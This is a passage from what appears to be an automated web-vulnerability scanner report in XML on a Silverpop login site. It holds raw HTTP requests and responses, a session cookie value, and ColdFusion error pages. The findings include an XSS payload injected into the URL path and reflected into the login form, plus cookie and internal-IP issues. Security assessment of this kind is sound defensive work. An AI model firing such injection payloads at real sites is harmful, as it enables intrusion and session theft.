	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/index.cfm?method=cLoginModule.loginUser&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:13 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>https://login1.vtrenz.net/index.cfm/%22ns=%22alert(0x000B59)</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>RawUrlInjection</vulnerableparametertype>
		<vulnerableparameter>URI-BASED</vulnerableparameter>
		<vulnerableparametervalue>/&quot;ns=&quot;netsparker(0x000B59)</vulnerableparametervalue>

		<rawrequest><![CDATA[GET /index.cfm/%22ns=%22netsparker(0x000B59) HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Mar 2011 11:09:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: USERID=;Expires=Tue, 8 Mar 2011 06:09:37 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,TIMESTAMP=;Expires=Tue, 8 Mar 2011 06:09:37 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,AUTHKEY=;Expires=Tue, 8 Mar 2011 06:09:37 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly
Content-Encoding: 
Vary: Accept-Encoding
Transfer-Encoding: chunked



	&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt;
	&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
	&lt;head&gt;
	&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
	&lt;title&gt;Login to Engage B2B&lt;/title&gt;
	&lt;style type=&quot;text/css&quot;&gt;
		@import url(&apos;/library/shared/chrome/css/layout.css&apos;);
		@import url(&apos;/library/shared/content/css/form.css&apos;);
		@import url(&apos;/library/loginmodule/css/login.css&apos;);
	&lt;/style&gt;
	&lt;script type=&quot;text/javascript&quot; src=&quot;/library/shared/chrome/js/prototype.js&quot;&gt;&lt;/script&gt;
	&lt;script type=&quot;text/javascript&quot; src=&quot;/library/shared/chrome/js/behaviour.js&quot;&gt;&lt;/script&gt;
	
	
	&lt;/head&gt;
	
	&lt;body&gt;
	
	&lt;div id=&quot;app&quot;&gt;
		&lt;div id=&quot;container&quot;&gt; 
			&lt;div id=&quot;content&quot;&gt;
				 
	&lt;form action=&quot;/&quot;ns=&quot;netsparker(0x000B59)?method=cLoginModule.loginUser&quot; method=&quot;post&quot; autocomplete=&quot;off&quot;&gt;
		&lt;p class=&quot;formRow&quot;&gt;
			&lt;label for=&quot;login&quot; class=&quot;prompt required&quot;&gt;Email&lt;/label&gt;
			&lt;div class=&quot;element&quot;&gt;
				&lt;input type=&quot;text&quot; id=&quot;login&quot; name=&quot;login&quot; value=&quot;&quot; tabindex=&quot;1&quot; class=&quot;xxlarge bigField&quot; /&gt;
			&lt;/div&gt;
		&lt;/p&gt;
		&lt;p class=&quot;formRow&quot;&gt;
			&lt;label for=&quot;password&quot; class=&quot;prompt required&quot;&gt;Password&lt;/label&gt;
			&lt;div class=&quot;element&quot;&gt;
				&lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; value=&quot;&quot; tabindex=&quot;2&quot; class=&quot;medium bigField&quot; /&gt; 
				&lt;a href=&quot;/&quot;ns=&quot;netsparker(0x000B59)?method=cLoginModule.displayPWDRetrieval&quot; class=&quot;note&quot;&gt;Forgot Your Password?&lt;/a&gt;
			&lt;/div&gt;
		&lt;/p&gt;
		&lt;p class=&quot;element formRow&quot;&gt;
			&lt;input type=&quot;image&quot; id=&quot;submit&quot; name=&quot;submit&quot; tabindex=&quot;3&quot; src=&quot;/library/shared/content/grfx/form/login.gif&quot; /&gt;
		&lt;/p&gt;
	&lt;/form&gt;
	&lt;script type=&quot;text/javascript&quot;&gt;
		document.getElementById(&apos;login&apos;).focus();
	&lt;/script&gt;

			&lt;/div&gt;
			
		&lt;/div&gt;
	&lt;/div&gt;
	
	&lt;div id=&quot;footer&quot;&gt;
		&lt;div id=&quot;copyright&quot;&gt;Silverpop is a registered trademark of Silverpop Systems Inc.  All other trademarks are the property of their respective owners. Copyright 2011. All rights reserved.&lt;/div&gt;
	&lt;/div&gt;
	
	&lt;/body&gt;
	&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=cLoginModule.loginUser</url>
		<type>InternalServerError</type>
		<severity>Low</severity>
		

		<rawrequest><![CDATA[GET /index.cfm?method=cLoginModule.loginUser HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            Element LOGIN is undefined in ATTRIBUTES.
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:06 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>

				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/</url>
		<type>CookieNotMarkedAsHttpOnly</type>
		<severity>Low</severity>
		

		<rawrequest><![CDATA[GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Mar 2011 11:06:33 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: USERID=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,TIMESTAMP=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,AUTHKEY=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,JSESSIONID=3c301ea994f00549756f634f3220e631d502TR;Secure;path=/
Content-Encoding: 
Vary: Accept-Encoding
Transfer-Encoding: chunked



	&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt;
	&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
	&lt;head&gt;
	&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
	&lt;title&gt;Login to Engage B2B&lt;/title&gt;
	&lt;style type=&quot;text/css&quot;&gt;
		@import url(&apos;/library/shared/chrome/css/layout.css&apos;);
		@import url(&apos;/library/shared/content/css/form.css&apos;);
		@import url(&apos;/library/loginmodule/css/login.css&apos;);
	&lt;/style&gt;
	&lt;script type=&quot;text/javascript&quot; src=&quot;/library/shared/chrome/js/prototype.js&quot;&gt;&lt;/script&gt;
	&lt;script type=&quot;text/javascript&quot; src=&quot;/library/shared/chrome/js/behaviour.js&quot;&gt;&lt;/script&gt;
	
	
	&lt;/head&gt;
	
	&lt;body&gt;
	
	&lt;div id=&quot;app&quot;&gt;
		&lt;div id=&quot;container&quot;&gt; 
			&lt;div id=&quot;content&quot;&gt;
				 
	&lt;form action=&quot;/index.cfm?method=cLoginModule.loginUser&quot; method=&quot;post&quot; autocomplete=&quot;off&quot;&gt;
		&lt;p class=&quot;formRow&quot;&gt;
			&lt;label for=&quot;login&quot; class=&quot;prompt required&quot;&gt;Email&lt;/label&gt;
			&lt;div class=&quot;element&quot;&gt;
				&lt;input type=&quot;text&quot; id=&quot;login&quot; name=&quot;login&quot; value=&quot;&quot; tabindex=&quot;1&quot; class=&quot;xxlarge bigField&quot; /&gt;
			&lt;/div&gt;
		&lt;/p&gt;
		&lt;p class=&quot;formRow&quot;&gt;
			&lt;label for=&quot;password&quot; class=&quot;prompt required&quot;&gt;Password&lt;/label&gt;
			&lt;div class=&quot;element&quot;&gt;
				&lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; value=&quot;&quot; tabindex=&quot;2&quot; class=&quot;medium bigField&quot; /&gt; 
				&lt;a href=&quot;/index.cfm?method=cLoginModule.displayPWDRetrieval&quot; class=&quot;note&quot;&gt;Forgot Your Password?&lt;/a&gt;
			&lt;/div&gt;
		&lt;/p&gt;
		&lt;p class=&quot;element formRow&quot;&gt;
			&lt;input type=&quot;image&quot; id=&quot;submit&quot; name=&quot;submit&quot; tabindex=&quot;3&quot; src=&quot;/library/shared/content/grfx/form/login.gif&quot; /&gt;
		&lt;/p&gt;
	&lt;/form&gt;
	&lt;script type=&quot;text/javascript&quot;&gt;
		document.getElementById(&apos;login&apos;).focus();
	&lt;/script&gt;

			&lt;/div&gt;
			
		&lt;/div&gt;
	&lt;/div&gt;
	
	&lt;div id=&quot;footer&quot;&gt;
		&lt;div id=&quot;copyright&quot;&gt;Silverpop is a registered trademark of Silverpop Systems Inc.  All other trademarks are the property of their respective owners. Copyright 2011. All rights reserved.&lt;/div&gt;
	&lt;/div&gt;
	
	&lt;/body&gt;
	&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
			<info name="Identified Cookie">JSESSIONID</info>
		</extrainformation>


        <classification>
            <OWASP>A6</OWASP>
            <WASC>15</WASC>
            <CWE>16</CWE>
            <CAPEC></CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>https://login1.vtrenz.net/index.cfm?method=cLoginModule.loginUser</url>
		<type>InternalIPLeakage</type>
		<severity>Low</severity>
		

		<rawrequest><![CDATA[GET /index.cfm?method=cLoginModule.loginUser HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            Element LOGIN is undefined in ATTRIBUTES.
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
